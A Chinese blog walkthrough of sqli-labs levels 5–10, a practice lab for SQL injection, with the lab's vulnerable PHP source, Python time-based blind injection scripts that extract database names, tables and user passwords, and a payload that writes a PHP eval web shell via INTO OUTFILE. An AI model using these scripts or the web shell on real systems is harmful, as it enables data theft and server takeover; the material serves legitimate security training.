sqli-lab5和10关详解

已于 2022-04-19 22:05:48 修改
阅读量2.3k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 网络 安全
于 2022-04-16 22:12:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cangyu51462/article/details/124201473
版权
本文详细解析了从LESS-5到LESS-10的SQL注入挑战,包括盲注、双引号注入、文件导入、布尔条件、时间利用等技术。通过实例展示了如何利用不同方法获取数据库信息、表名、列名以及敏感数据,涉及数据库版本、权限管理和漏洞利用策略。
摘要由CSDN通过智能技术生成

LESS-5 不用注释的查询

注:这节的跟第一关是一样的,输入?id=1,但是返回结果只有:you are in … 正确的思路是盲注。
查看源代码不会返回数据库当中的信息了,所以我们不能利用less1-4 的方法

$id=$_GET['id'];
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//此处省略部分代码
if($row)
    {
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	echo '<font size="3" color="#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';

输入?id=1’and left(version(),1)=5–+,这里的–+是 - +,因为CSDN显示问题。
上面sql语句的意思是查看一下数据库的版本,看版本号的第一位是不是 5,明显的返回的结果是正确的。我的数据库版本号为 5.6.26
在这里插入图片描述
当版本号不正确的时候,则不能正确显示 you are in…
接下来看一下数据库的长度
?id=1’and length(database())=X–+
X的值为8时,返回正确结果,说明长度为 8。
猜测数据库第一位
?id=1’and left(database(),1)>‘m’–+
根据折半查找,我们知道数据库的首字母为s,这里的工作量太大,我写了一个python脚本完成,用的时间盲注原理

import requests
import time

url="http://127.0.0.1/sqli/Less-5/?id=1"
database = 'select schema_name from information_schema.schemata'
result=""

for i in range(1,100):
    for j in range(1,200):
        payload="'and if(ascii(substr(({} limit 4,1),{},1))={},sleep(2),1)--+".format(database,i,j)
        stime = time.time()
        r = requests.get(url+payload)
        etime=time.time()
        if etime-stime >= 2:
            result += chr(j)
            print(result)
            break

成果获取数据库的名字security,也可以获取其他数据库名字,具体改limit的值。
可获取的数据库是information_schema,challenges,mysql,performance_schema,security,sys
在这里插入图片描述
根据一开始获得的数据库首字母为s,那么当前数据库为security,那么表的名字也可以获取

import requests
import time

url="http://127.0.0.1/sqli/Less-5/?id=1"
table='select table_name from information_schema.tables where table_schema=database() '
result=""

for i in range(1,100):
    for j in range(1,200):
        payload="'and if(ascii(substr(({} limit 3,1),{},1))={},sleep(2),1)--+".format(table,i,j)
        stime = time.time()
        r = requests.get(url+payload)
        etime=time.time()
        if etime-stime >= 2:
            result += chr(j)
            print(result)
            break

可以获得到email,refers,uagent,users四个表,也可以用下面的句子慢慢测试,当然还是代码快
?id=1 'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0
0,1),1,1))>101–+

列自然也是相同的方法

import requests
import time

url="http://127.0.0.1/sqli/Less-5/?id=1"
column='select column_name from information_schema.columns where table_name="users"'
result=""

for i in range(1,100):
    for j in range(1,200):
        payload="'and if(ascii(substr(({} limit 3,1),{},1))={},sleep(2),1)--+".format(column,i,j)
        stime = time.time()
        r = requests.get(url+payload)
        etime=time.time()
        if etime-stime >= 2:
            result += chr(j)
            print(result)
            break

可以查到的列为USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

查id为1的数据

import requests
import time

url="http://127.0.0.1/sqli/Less-5/?id=1"
data="select username from security.users where id=1 "
data2="select password from security.users where id=1 "
result=""
result2=""

for i in range(1,100):
    for j in range(1,200):
        payload="'and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),1)--+".format(data,i,j)
        payload2 = "'and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),1)--+".format(data2, i, j)
        stime = time.time()
        r = requests.get(url+payload)
        etime=time.time()
        if etime-stime >= 2:
            result += chr(j)
            result2 += chr(j)
            print(result)
            print(result2)
            break

通过改id我们可以查到所有数据
完成

LESS-6 双注入- 双引号-字符型

Less6 与 less5 的区别在于 less6 在 id 参数传到服务器时,对 id 参数进行了处理。这里可以从
源代码中可以看到。只需要将 ‘ 替换成 “ 。

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

还是利用上面的代码,稍微在sql注入语句改个符号

import requests
import time

url="http://127.0.0.1/sqli/Less-6/?id=1"
database = 'select schema_name from information_schema.schemata'
result=""

for i in range(1,100):
    for j in range(1,200):
        payload='"and if(ascii(substr(({} limit 4,1),{},1))={},sleep(2),1)--+'.format(database,i,j)
        stime = time.time()
        r = requests.get(url+payload)
        etime=time.time()
        if etime-stime >= 2:
            result += chr(j)
            print(result)
            break

具体步骤和less5差不多

LESS-7 文件导入的方式进行注入

MySQL注入load_file常用路径可以参考博客:www.cnblogs.com/lcamry/p/5729087.html

调查源代码

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

看到这个,在前面的1到6关的训练下,已经老生常谈了?id=1’)) or 1=1–+(注:这里是- - +)
在这里插入图片描述
可以看到显示这样的界面,这个时候要使用into outfile(),在此之前,需要检查权限
SHOW GLOBAL VARIABLES LIKE ‘%secure%’
在这里插入图片描述
secure_file_priv要为空白才可以,为null是不允许上传下载。修改方法为在my.ini中的[mysqld]改或写secure_file_priv= 。然后重启mysql服务。

?id=-1’))union select 1,2,3 into outfile “c:\文件目录/Less-7/a.txt”–+
实验一下能不能写入一个txt文件,我这里是可以的。

没问题的话进行下一步,导入一句话木马
?id=1’))union select 1,2,’<?php @eval($_POST[“password”])?>’ into outfile “c:\文件目录/Less-7/password.php”–+

注意这里的post需要大写,如果没大写,菜刀可能报403的错

之后使用中国菜刀连接,输入网址和密码(password),就可以进去了

LESS-8 基于布尔-单引号-盲注

根据测试’and 1=1–+没有报错,可以知道怎么继续了,感觉和第五关差不多,具体区别在代码,可以看到在判断错误进行注释,用不了报错注入

if($row)
	{
  	......
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	//echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';

这里可以参考第5关的代码,一模一样的套用没有一点问题。

LESS-9 基于 时间-单引号- 盲注

经过测试我们可以发现,无论加入任何语句,它的返回都是一样的:You are in…
查看源代码

$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

这里可以套用我第五关的脚本,因为在第五关就是用时间盲注。

LESS-10 基于 时间-双引号- 盲注

套用第六关的脚本,或者将第五关的单引号改为双引号,基本上无差别

苍雨おとな
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶场 sqli-lab 5-10
ad12456的博客
04-12 1433
sqli-lab学习
sqli_libs第五
qq_42103643的博客
07-24 185
第五 第一种:非常复杂,我也没太搞明白 order by 3正常,order by 4异常 ’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a–+ 查数据库名 union SELECT null,count(*),concat((select table_name from information_schema.table
sqli-labs靶场第十
gou1791241251的博客
12-26 852
第十与第九差在了单引号和双引号 使用延时注入即可
sqlilabs 1-10
weixin_48993614的博客
07-11 666
根据提示,第一是get单引号 第一步,看看页面有没有报错 http://192.168.26.132:86/Less-1/?id=1’ and 1=2–+ 页面直接异常 猜测字段 :http://192.168.26.132:86/Less-1/?id=-1’ order by 3–+ 回显位 :http://192.168.26.132:86/Less-1/?id=-1’ union select 1,2,3–+ 当前用户和数据库 :http://192.168.26.132:86/Less-1/
SQLi Labs Lesson5
1ame的博客
08-02 667
Lesson-5 GET - Doube Injection - Single Quotes - String 首先进入欢迎界面 构造?id=1,结果如图所示 构造?id=2, id=3,(id由1到14),结果均如上图所示。 构造?id=1' ,结果如图所示。 很显然是因为$id右边本来有一个单引号,结果因为添加的单引号后,多出来一个单引号。
sqli-labtxt
07-22
在这个sqli-labtxt文件中,我们预计会找到一系列SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是一个PHP调试环境的程序...
sqli-lab操作详解
07-12
总结,SQL注入是一个严重的安全问题,理解和掌握如何在`sqli-lab`中操作布尔盲注是提高安全意识和技能的重要步骤。通过实践,你可以更深入地了解SQL注入的机制,并学会如何避免和防御这种攻击。
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
sqlilabs第五
wh1sper、的博客
04-02 1276
文章目录前言一、二次注入二、别的方法三、sqlmap 前言 本来这篇博客前几天就准备写,奈何因为各种原因拖到了现在,然后参加ctf又白给 不说了,都是泪。(流眼泪.jpg) 如有错误希望各位师傅指正(拜托.jpg) 一、二次注入 本次采用的靶场为sqlilabs的第五题。 题目明确说了是二次注入。 输入?id=1’ http://127.0.0.1/sqli-labs-master/Less-5/?id=1' 判断字段数 输入?id=1’ order by 4 %23 发现只有三个字段 http://1
sqli-labs第五(配合布尔盲注以及python脚本))
加油~
05-11 1184
进入第五,正常显示如下:![image.png](https://img-blog.csdnimg.cn/img_convert/fb62cfcc13c424b26cdbc08d0250f9eb.png#clientId=udf7edcfc-d50d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=864&id=u753066f5&margin=[object Object]&name=
sqli-labs-----第五
wyzhxhn的博客
11-06 870
单引号字符型updatexml报错注入
sql-labs第五
qq_63267612的博客
03-26 1186
文章目录 第5用前面的id=1时页面报错,无法进行下一步,上网查资料,要用到报错注入
sqli-labtips 第五~第六
weixin_44089266的博客
04-06 845
** 第五和第六为报错型sql注入,此处只对第五进行详解** 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅。 首先在未知闭合方式的条件下,构造payload进行测试 http://192.168.226.136/sqli-labs-master/Less-5/?id=1 观察到页面回显如下 重新构造payload h...
sqli-lab less-5
weixin_47346400的博客
02-03 201
sqli-lab less-5 下图来自b站up主(sqli-lab全套视频很详细强烈推荐) up主传送门 总结 此题解法:①手动注入 ②:python脚本 ③:mysql自动化工具 ④:burpsuite 上图1,2步骤为测试是否存在注入点,3,4为两种解法, 这里讲一下4方法为什么是错误不可行的。 将>156–+改为>1890–+仍然显示 “you are in” 故4方法不能用。 这里我们采取图片二的方法: ...
Sqli-labs--less-5
小人物的博客
05-21 650
less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入) 双查询注入顾名思义形式上是两个嵌套的查询,即select …(select …),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到了几个sql函数: rand()随机函数,返回0~1之间的...
sql-lab 1~5
开心星人的博客
05-12 611
1 ?id=1 ?id=1' ?id=1%27--+ ?id=1' order by 1--+ ?id=1' order by 4--+ 所以有四个字段 ?id=1' union select 1,2,3--+ 因为web页面只能显示一行数据 ?id=-1' union select 1,2,3--+ 将让第一行数据显示不出来 或者 ?id=1' union select 1,2,3 limit 1,1--+ 可以看到有回显的字段2和字段3 ?id=-1' union select 1,2,g
sqli-lab第5---第10
qq_54037445的博客
10-06 1763
sqli-lab,get类型,时间盲注,布尔盲注,报错注入,详细讲解
sqli-lab第七
07-28
对于sqli-lab的第七,你可以尝试使用SQL注入来绕过身份验证,获取管理员权限。在用户名和密码输入框中,尝试输入以下的payload来进行注入: 用户名:admin' or 1=1-- 密码:任意密码 这个payload的作用是通过在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值